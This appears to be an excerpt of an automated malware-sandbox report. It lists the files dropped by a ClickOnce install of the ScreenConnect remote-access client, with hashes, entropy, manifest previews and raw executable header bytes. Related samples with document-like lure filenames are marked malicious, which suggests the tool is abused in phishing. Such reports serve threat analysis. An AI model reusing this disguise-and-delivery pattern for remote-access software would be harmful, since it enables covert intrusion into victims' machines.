                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):3452
                                                                                                                                                                                                Entropy (8bit):4.485839718784607
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:AfJ3uWWWeV+WwQXlmL4Mco7rwQQNLokgSKhIYX:k3yJUUMco3QxgLf
                                                                                                                                                                                                MD5:9BFA752E711DE8F1CDEED9F2FAC23AD2
                                                                                                                                                                                                SHA1:DEAF928E71ED962C4E9F4AC91F0B9AC283E5E907
                                                                                                                                                                                                SHA-256:54FC2412F19D2D3B14D60AA7656E7BF13852DF681C1C23A03B3D56C51DF7BE00
                                                                                                                                                                                                SHA-512:3C7233478E804677E93F67BDFC91644CD0F34C45483A83A4687DFE51F2475AC734056E146FAD2FBEC0CD07331F0CAC52379F8F732450EF98CE3127EEDA3AA12A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:PcmH.........q......#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........3..L.G.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...............................................'...............................................'...............................................'...............................................'...nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............D...........MdSp(...$...(...(...#............... urn:schemas
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1216
                                                                                                                                                                                                Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):5260
                                                                                                                                                                                                Entropy (8bit):4.866633492547934
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:7Nq6R84zeV+Ww7mkVyuokZR+PtYAaUeiBdVfNOSnwnjIbm:/R840JCVbPZR+VHaodXCjd
                                                                                                                                                                                                MD5:99DEA98517A9C532BC5723877FB45B58
                                                                                                                                                                                                SHA1:27810040D57557B4163188933E667D7F31CCFDD5
                                                                                                                                                                                                SHA-256:6BC2A0837BBB6B84E1E158C1D207F0C9DE324C58FDAACA305CDBD71344A0322F
                                                                                                                                                                                                SHA-512:468DA0677458347A8A92559934F2113C7C7E0381D3FA2F2E0CCD89F39A8F5D225F8E1600236552C20F19434E1CE4C8FB72F788F5C06F77DBB9602DE59804014A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:PcmH........8..'".4...t.......T...............P...........3........<.g..J.|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$...........3..L.G.....[.......................z..w.....[~31.X....C.........y..&..d......B(.........^.ie...u"...F.....Ey%.....E..X.(...s".I...R)....+.`...m,......;../............... ...#...&...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........l...@.......................................(........... .......(...(...<.......d.......l.......|...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(...............d...........p...............................................'...............................................'...............................................'...............................................'.......................
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1982
                                                                                                                                                                                                Entropy (8bit):5.057585371364542
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):6588
                                                                                                                                                                                                Entropy (8bit):3.9950372668229455
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:6MmxveV+WwwU8WpjHowxlaLpuy+40Hq5UwD6ksJqi/D5:Wx4JwpjTL+3+40H4zZw75
                                                                                                                                                                                                MD5:77EBB11984CE5F59780E556871BF16F2
                                                                                                                                                                                                SHA1:333C1E0892E7B603B657BBBD3B561CEF62478583
                                                                                                                                                                                                SHA-256:CA4C4AB14AF88FD8BF370F70774D3C7B74C8EDE63FE9D8E80946451BABA4D075
                                                                                                                                                                                                SHA-512:8B54F5680AD13B61E4016D520D57436552E5633EA4AA84D290B76CC79DC2870F85103D08891FE2B4D08E398377226BEBBDD4BF7414E95517E95992362FFC94C0
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:PcmH.........i;..>s.@...........T...............t...........?........<.g..J.|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.........}'.d................z..w.....[~31.X....y..&..d......B(.........C....."...^.ie...u%...[s.T..<(...s".I...R)...F.....Ey,.....E..X./...f..VC..2...O.&r..Vz5......;..8.....V....X;........... ...#...&...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...X...........@........................... .......0...(...8.......`.......h.......x...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(.......................(...$.......L.......T...(...l...................(.......................(...........................................................................'.......................
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2573
                                                                                                                                                                                                Entropy (8bit):5.026361555169168
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):3032
                                                                                                                                                                                                Entropy (8bit):4.873813172917691
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:2MQScjgye6S+9oww7g47Jw+f7iI++5dFkEM6VbjftLjnwbb:2XScheV+WwwnJwOiMRkbortLjnEb
                                                                                                                                                                                                MD5:099A7A25A9CCBB2DF9AB39ACFD4C8561
                                                                                                                                                                                                SHA1:F258B670488C71EE7B196F23E1E52218FAAA2176
                                                                                                                                                                                                SHA-256:23BCD9D2D07BC800606E75CC23B2630040EDE524940E7D2BBAE0635B11D156D5
                                                                                                                                                                                                SHA-512:A9AA4E75D4A7E9FC60ADB8CB2F5D3F370B06FF72A54641114667B919A873B699C1E1F97F3C3DF93B9CFF4F79F46C826B52CFEFDB54814D0A141528CFBA4C8A2D
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:PcmH........p..-..y............T....................................<.g..J.|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...........................................................'...............................................'...............................................'...nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............<...........MdSp ...$....... ...".............Bp urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1041
                                                                                                                                                                                                Entropy (8bit):5.147328807370198
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):14612
                                                                                                                                                                                                Entropy (8bit):5.714603865129983
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:/TWh4+An9q5s6VHoY8s8oXN8s8oTN2x2QPIlFDLhEDh7BqWoDOs:/TWY9qS6VTX9dX9R/QPIBM7YDb
                                                                                                                                                                                                MD5:84C34D082FFFFE4A2E181946682A9B1C
                                                                                                                                                                                                SHA1:5033E1B0B944D87E4308E3B6D23DD204DCB788BA
                                                                                                                                                                                                SHA-256:259D9FA007F0D3ED64D71A05AE28E3626EF49260A2DF1D56FBFF33DE2B395264
                                                                                                                                                                                                SHA-512:36C23D3B7ED7829A2850BDC8C4EAC765670450A2E20D9DC98D5641A837F121CC899558D8461E4302303C85EBBE66051AFDDAE1E44DA4D93B23071AC18F05C9FB
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:PcmH..........\I.>M$...@.......T...............8...........#........<.g..J.|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$...........3..L.G..........8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......@8......H8......P8......p8......t8..L...|8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%....]...Tk....Y?.Om...............-........................E..................................'...4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.2.10.8991........................
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):147976
                                                                                                                                                                                                Entropy (8bit):5.699150757460175
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:0aNYcT51/FXvMVNWfCXq9ymdrpErpErpXm2o9HuzhJOvP:0dcfiVITrpErpErpXmt8vOvP
                                                                                                                                                                                                MD5:B7DEB98212080D0214AD779A9446FF09
                                                                                                                                                                                                SHA1:05FAD5E8F0131FB5DD9D6EFA8F879E8FA684B569
                                                                                                                                                                                                SHA-256:C8DC03F64AA8D794D5A763B4260C18967267B7E9C55E1BE8D0ECCF5107C9D49A
                                                                                                                                                                                                SHA-512:7F93A5DF3A29312518CE188DBD72B987FD5B99DB58C4E8ACC7FF9677907B1B74F2126A6D4FD1DEF4FE136649D5690EB3EBFE739D57299C0A6E4E5EA7DB1C74E2
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):4428
                                                                                                                                                                                                Entropy (8bit):4.222375296253386
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:7GvXQeV+Ww8U45uXWOH5VEQ5WVXkoNOrf:7qPJjuX/xPoq
                                                                                                                                                                                                MD5:7CEE72E3F9C2B40E60408B50C1C61AEC
                                                                                                                                                                                                SHA1:D56A041D8DFE63BE897A056DDE273126118934F7
                                                                                                                                                                                                SHA-256:6DD9D20C15EFD95CC33CA5ACCE3D84C3C433E890EAFB55A1B6D903A8D17861CD
                                                                                                                                                                                                SHA-512:AE4B2812506EEED6C12A05C95609E0BD3785C30280256C2DB3AFF5998A1015F678B50D6C10330B0C29C584BEC748A39052DD75D6973E0EBA2BA3F0E857EF53D6
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:PcmH...........R...8,...T.......T...............8...........+........<.g..J.|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$...........3..L.G........6...................z..w.....[~31.X....y..&..d......B(.........[s.T..<....s".I...R......E..X.!...O.&r..Vz$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......|...........(...............................(................... ...(...4.......\.......d...(...|...................(...............L...........0...............................................'...............................................'...............................................'...............................................'...............................................'...............................................'...nameScreenConnect.Cl
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1636
                                                                                                                                                                                                Entropy (8bit):5.084538887646832
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):95520
                                                                                                                                                                                                Entropy (8bit):6.505346220942731
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                • Filename: statments.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: sstatment.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: extukGiBrn.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Vh0tTzx4Ko.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Browse
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):61216
                                                                                                                                                                                                Entropy (8bit):6.31175789874945
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                • Filename: statments.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: sstatment.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: extukGiBrn.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Vh0tTzx4Ko.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Browse
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):266
